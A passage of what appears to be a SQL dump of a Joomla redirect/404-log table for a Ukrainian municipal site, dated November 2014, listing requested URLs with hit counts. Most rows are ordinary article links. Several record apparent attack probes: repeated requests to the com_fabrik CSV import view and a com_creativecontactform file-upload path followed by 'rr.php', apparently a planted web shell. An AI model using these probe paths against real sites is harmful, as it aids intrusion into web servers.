00:00:00',301),(9930,'http://malyn-rayrada.org.ua/8100/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-04 12:48:49','0000-00-00 00:00:00',301),(9931,'http://www.malyn-rayrada.org.ua/elperiodigolf/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',5,0,'2014-11-04 13:07:41','0000-00-00 00:00:00',301),(9932,'http://malyn-rayrada.org.ua/tulib/components/com_community/index.html','','','',1,0,'2014-11-04 13:31:32','0000-00-00 00:00:00',301),(9933,'http://malyn-rayrada.org.ua/tulib/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-04 13:31:36','0000-00-00 00:00:00',301),(9934,'http://www.malyn-rayrada.org.ua/w1/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-04 14:48:29','0000-00-00 00:00:00',301),(9935,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-11-04 15:09:53','0000-00-00 00:00:00',301),(9936,'http://malyn-rayrada.org.ua/joomla/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-04 15:46:56','0000-00-00 00:00:00',301),(9937,'http://www.malyn-rayrada.org.ua/webschool/components/com_community/index.html','','','',2,0,'2014-11-04 15:59:34','0000-00-00 00:00:00',301),(9938,'http://www.malyn-rayrada.org.ua/webschool/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-11-04 15:59:43','0000-00-00 00:00:00',301),(9939,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=en','','','',1,0,'2014-11-04 16:22:27','0000-00-00 00:00:00',301),(9940,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=ru','','','',1,0,'2014-11-04 16:22:33','0000-00-00 00:00:00',301),(9941,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=ru','','','',1,0,'2014-11-04 16:22:39','0000-00-00 00:00:00',301),(9942,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=en','','','',1,0,'2014-11-04 16:22:45','0000-00-00 00:00:00',301),(9943,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=ru','','','',1,0,'2014-11-04 16:22:47','0000-00-00 00:00:00',301),(9944,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=ru','','','',1,0,'2014-11-04 16:22:58','0000-00-00 00:00:00',301),(9945,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=en','','','',1,0,'2014-11-04 16:23:00','0000-00-00 00:00:00',301),(9946,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=ru','','','',1,0,'2014-11-04 16:23:08','0000-00-00 00:00:00',301),(9947,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=en','','','',1,0,'2014-11-04 16:23:11','0000-00-00 00:00:00',301),(9948,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=ru','','','',1,0,'2014-11-04 16:23:19','0000-00-00 00:00:00',301),(9949,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=en','','','',1,0,'2014-11-04 16:23:28','0000-00-00 00:00:00',301),(9950,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=ru','','','',2,0,'2014-11-04 16:23:36','0000-00-00 00:00:00',301),(9951,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=ru','','','',2,0,'2014-11-04 16:23:40','0000-00-00 00:00:00',301),(9952,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=ru','','','',2,0,'2014-11-04 16:23:45','0000-00-00 00:00:00',301),(9953,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=ru','','','',1,0,'2014-11-04 16:23:56','0000-00-00 00:00:00',301),(9954,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=en','','','',1,0,'2014-11-04 16:23:59','0000-00-00 00:00:00',301),(9955,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=ru','','','',1,0,'2014-11-04 16:24:08','0000-00-00 00:00:00',301),(9956,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=en','','','',1,0,'2014-11-04 16:24:11','0000-00-00 00:00:00',301),(9957,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=ru','','','',1,0,'2014-11-04 16:24:13','0000-00-00 00:00:00',301),(9958,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=en','','','',1,0,'2014-11-04 16:24:16','0000-00-00 00:00:00',301),(9959,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=en','','','',4,0,'2014-11-04 16:24:28','0000-00-00 00:00:00',301),(9960,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=en','','','',1,0,'2014-11-04 16:24:46','0000-00-00 00:00:00',301),(9961,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=ru','','','',1,0,'2014-11-04 16:24:48','0000-00-00 00:00:00',301),(9962,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=ru','','','',1,0,'2014-11-04 16:24:54','0000-00-00 00:00:00',301),(9963,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=ru','','','',1,0,'2014-11-04 16:25:35','0000-00-00 00:00:00',301),(9964,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=ru','','','',1,0,'2014-11-04 16:25:42','0000-00-00 00:00:00',301),(9965,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=ru','','','',1,0,'2014-11-04 16:25:47','0000-00-00 00:00:00',301),(9966,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=en','','','',1,0,'2014-11-04 16:25:53','0000-00-00 00:00:00',301),(9967,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=ru','','','',1,0,'2014-11-04 16:25:56','0000-00-00 00:00:00',301),(9968,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=en','','','',1,0,'2014-11-04 16:26:00','0000-00-00 00:00:00',301),(9969,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=ru','','','',1,0,'2014-11-04 16:26:02','0000-00-00 00:00:00',301),(9970,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=en','','','',1,0,'2014-11-04 16:26:06','0000-00-00 00:00:00',301),(9971,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=en','','','',1,0,'2014-11-04 16:26:16','0000-00-00 00:00:00',301),(9972,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=ru','','','',2,0,'2014-11-04 16:26:25','0000-00-00 00:00:00',301),(9973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-04 16:26:37','0000-00-00 00:00:00',301),(9974,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=en','','','',1,0,'2014-11-04 16:26:51','0000-00-00 00:00:00',301),(9975,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=ru','','','',1,0,'2014-11-04 16:26:54','0000-00-00 00:00:00',301),(9976,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=en','','','',2,0,'2014-11-04 16:27:01','0000-00-00 00:00:00',301),(9977,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=en','','','',1,0,'2014-11-04 16:27:11','0000-00-00 00:00:00',301),(9978,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=ru','','','',1,0,'2014-11-04 16:27:15','0000-00-00 00:00:00',301),(9979,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=en','','','',1,0,'2014-11-04 16:27:19','0000-00-00 00:00:00',301),(9980,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=ru','','','',2,0,'2014-11-04 16:27:24','0000-00-00 00:00:00',301),(9981,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=en','','','',1,0,'2014-11-04 16:27:27','0000-00-00 00:00:00',301),(9982,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=en','','','',1,0,'2014-11-04 16:27:33','0000-00-00 00:00:00',301),(9983,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=en','','','',1,0,'2014-11-04 16:27:38','0000-00-00 00:00:00',301),(9984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=ru','','','',1,0,'2014-11-04 16:27:46','0000-00-00 00:00:00',301),(9985,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=ru','','','',1,0,'2014-11-04 16:27:56','0000-00-00 00:00:00',301),(9986,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=en','','','',1,0,'2014-11-04 16:27:59','0000-00-00 00:00:00',301),(9987,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=ru','','','',1,0,'2014-11-04 16:28:04','0000-00-00 00:00:00',301),(9988,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=en','','','',1,0,'2014-11-04 16:28:13','0000-00-00 00:00:00',301),(9989,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=ru','','','',1,0,'2014-11-04 16:28:17','0000-00-00 00:00:00',301),(9990,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=ru','','','',11,0,'2014-11-04 16:28:29','0000-00-00 00:00:00',301),(9991,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=en','','','',1,0,'2014-11-04 16:28:37','0000-00-00 00:00:00',301),(9992,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=ru','','','',1,0,'2014-11-04 16:28:42','0000-00-00 00:00:00',301),(9993,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=en','','','',1,0,'2014-11-04 16:28:47','0000-00-00 00:00:00',301),(9994,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=ru','','','',2,0,'2014-11-04 16:28:52','0000-00-00 00:00:00',301),(9995,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=ru','','','',2,0,'2014-11-04 16:28:59','0000-00-00 00:00:00',301),(9996,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=en','','','',1,0,'2014-11-04 16:29:03','0000-00-00 00:00:00',301),(9997,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=ru','','','',1,0,'2014-11-04 16:29:07','0000-00-00 00:00:00',301),(9998,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=ru','','','',1,0,'2014-11-04 16:29:18','0000-00-00 00:00:00',301),(9999,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=ru','','','',1,0,'2014-11-04 16:29:29','0000-00-00 00:00:00',301),(10000,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-04 16:29:35','0000-00-00 00:00:00',301),(10001,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-11-04 16:31:56','0000-00-00 00:00:00',301),(10002,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-11-04 16:32:20','0000-00-00 00:00:00',301),(10003,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=en','','','',1,0,'2014-11-04 16:32:29','0000-00-00 00:00:00',301),(10004,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=ru','','','',1,0,'2014-11-04 16:32:45','0000-00-00 00:00:00',301),(10005,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=en','','','',1,0,'2014-11-04 16:32:49','0000-00-00 00:00:00',301),(10006,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=ru','','','',1,0,'2014-11-04 16:33:00','0000-00-00 00:00:00',301),(10007,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47&Itemid=86&lang=ru','','','',2,0,'2014-11-04 16:33:06','0000-00-00 00:00:00',301),(10008,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-11-04 16:33:10','0000-00-00 00:00:00',301),(10009,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=en','','','',1,0,'2014-11-04 16:33:19','0000-00-00 00:00:00',301),(10010,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=ru','','','',1,0,'2014-11-04 16:33:22','0000-00-00 00:00:00',301),(10011,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=ru','','','',1,0,'2014-11-04 16:33:33','0000-00-00 00:00:00',301),(10012,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=ru','','','',1,0,'2014-11-04 16:33:59','0000-00-00 00:00:00',301),(10013,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=927:2013-02-21-09-06-04&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-11-04 16:34:02','0000-00-00 00:00:00',301),(10014,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=ru','','','',1,0,'2014-11-04 16:34:13','0000-00-00 00:00:00',301),(10015,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=en','','','',1,0,'2014-11-04 16:34:16','0000-00-00 00:00:00',301),(10016,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49&Itemid=88&lang=en','','','',1,0,'2014-11-04 16:34:28','0000-00-00 00:00:00',301),(10017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-11-04 16:35:33','0000-00-00 00:00:00',301),(10018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-04 16:35:49','0000-00-00 00:00:00',301),(10019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:-lr-&catid=59:--20062014-&Itemid=107&lang=ru','','','',8,0,'2014-11-04 16:36:33','0000-00-00 00:00:00',301),(10020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:-2012-2015-&catid=59:--20062014-&Itemid=107&lang=uk','','','',3,0,'2014-11-04 16:36:47','0000-00-00 00:00:00',301),(10021,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56&Itemid=97&lang=uk','','','',4,0,'2014-11-04 16:41:25','0000-00-00 00:00:00',301),(10022,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56&Itemid=97&lang=uk','','','',6,0,'2014-11-04 16:41:30','0000-00-00 00:00:00',301),(10023,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-04 16:41:39','0000-00-00 00:00:00',301),(10024,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-04 16:41:44','0000-00-00 00:00:00',301),(10025,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-04 16:41:47','0000-00-00 00:00:00',301),(10026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=en','','','',3,0,'2014-11-04 18:15:30','0000-00-00 00:00:00',301),(10027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=en','','','',4,0,'2014-11-04 21:02:20','0000-00-00 00:00:00',301),(10028,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-04 21:20:16','0000-00-00 00:00:00',301),(10029,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 00:24:46','0000-00-00 00:00:00',301),(10030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-05 01:22:00','0000-00-00 00:00:00',301),(10031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-05 01:25:37','0000-00-00 00:00:00',301),(10032,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-05 01:41:22','0000-00-00 00:00:00',301),(10033,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-05 01:55:37','0000-00-00 00:00:00',301),(10034,'http://malyn-rayrada.org.ua/relax_go/index.php','','','',1,0,'2014-11-05 02:04:16','0000-00-00 00:00:00',301),(10035,'http://malyn-rayrada.org.ua/relax_go/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2014-11-05 02:04:20','0000-00-00 00:00:00',301),(10036,'http://malyn-rayrada.org.ua/relax_go/components/com_creativecontactform/fileupload/files/rr.php','','','',1,0,'2014-11-05 02:04:24','0000-00-00 00:00:00',301),(10037,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=en','','','',1,0,'2014-11-05 03:09:01','0000-00-00 00:00:00',301),(10038,'http://www.malyn-rayrada.org.ua/php/components/com_community/index.html','','','',1,0,'2014-11-05 04:06:12','0000-00-00 00:00:00',301),(10039,'http://www.malyn-rayrada.org.ua/php/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-05 04:06:15','0000-00-00 00:00:00',301),(10040,'http://www.malyn-rayrada.org.ua/blog/components/com_community/index.html','','','',1,0,'2014-11-05 04:11:24','0000-00-00 00:00:00',301),(10041,'http://www.malyn-rayrada.org.ua/blog/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-05 04:11:28','0000-00-00 00:00:00',301),(10042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-11-05 07:16:25','0000-00-00 00:00:00',301),(10043,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-11-05 07:16:27','0000-00-00 00:00:00',301),(10044,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-11-05 08:20:23','0000-00-00 00:00:00',301),(10045,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1215:-1200-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-05 08:21:07','0000-00-00 00:00:00',301),(10046,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-05 08:45:27','0000-00-00 00:00:00',301),(10047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-11-05 08:51:43','0000-00-00 00:00:00',301),(10048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=en','','','',2,0,'2014-11-05 09:01:17','0000-00-00 00:00:00',301),(10049,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 10:57:30','0000-00-00 00:00:00',301),(10050,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-05 10:57:35','0000-00-00 00:00:00',301),(10051,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=en&Itemid=','','','',1,0,'2014-11-05 10:57:41','0000-00-00 00:00:00',301),(10052,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-05 10:57:46','0000-00-00 00:00:00',301),(10053,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-05 10:58:02','0000-00-00 00:00:00',301),(10054,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 10:58:21','0000-00-00 00:00:00',301),(10055,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 10:58:24','0000-00-00 00:00:00',301),(10056,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 10:58:28','0000-00-00 00:00:00',301),(10057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-05 10:58:56','0000-00-00 00:00:00',301),(10058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-05 10:59:02','0000-00-00 00:00:00',301),(10059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-05 10:59:21','0000-00-00 00:00:00',301),(10060,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1182:2014-01-23-06-45-09&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-05 13:05:42','0000-00-00 00:00:00',301),(10061,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:11:33','0000-00-00 00:00:00',301),(10062,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-05 13:11:37','0000-00-00 00:00:00',301),(10063,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:11:52','0000-00-00 00:00:00',301),(10064,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:11:57','0000-00-00 00:00:00',301),(10065,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:12:00','0000-00-00 00:00:00',301),(10066,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:12:05','0000-00-00 00:00:00',301),(10067,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:12:19','0000-00-00 00:00:00',301),(10068,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:12:23','0000-00-00 00:00:00',301),(10069,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:12:28','0000-00-00 00:00:00',301),(10070,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:12:33','0000-00-00 00:00:00',301),(10071,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=ru&Itemid=','','','',6,0,'2014-11-05 13:12:37','0000-00-00 00:00:00',301),(10072,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=uk&Itemid=','','','',4,0,'2014-11-05 13:12:42','0000-00-00 00:00:00',301),(10073,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:12:48','0000-00-00 00:00:00',301),(10074,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:12:53','0000-00-00 00:00:00',301),(10075,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-05 13:12:57','0000-00-00 00:00:00',301),(10076,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-05 13:13:00','0000-00-00 00:00:00',301),(10077,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:13:14','0000-00-00 00:00:00',301),(10078,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-05 13:13:17','0000-00-00 00:00:00',301),(10079,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-05 13:14:18','0000-00-00 00:00:00',301),(10080,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-05 13:14:39','0000-00-00 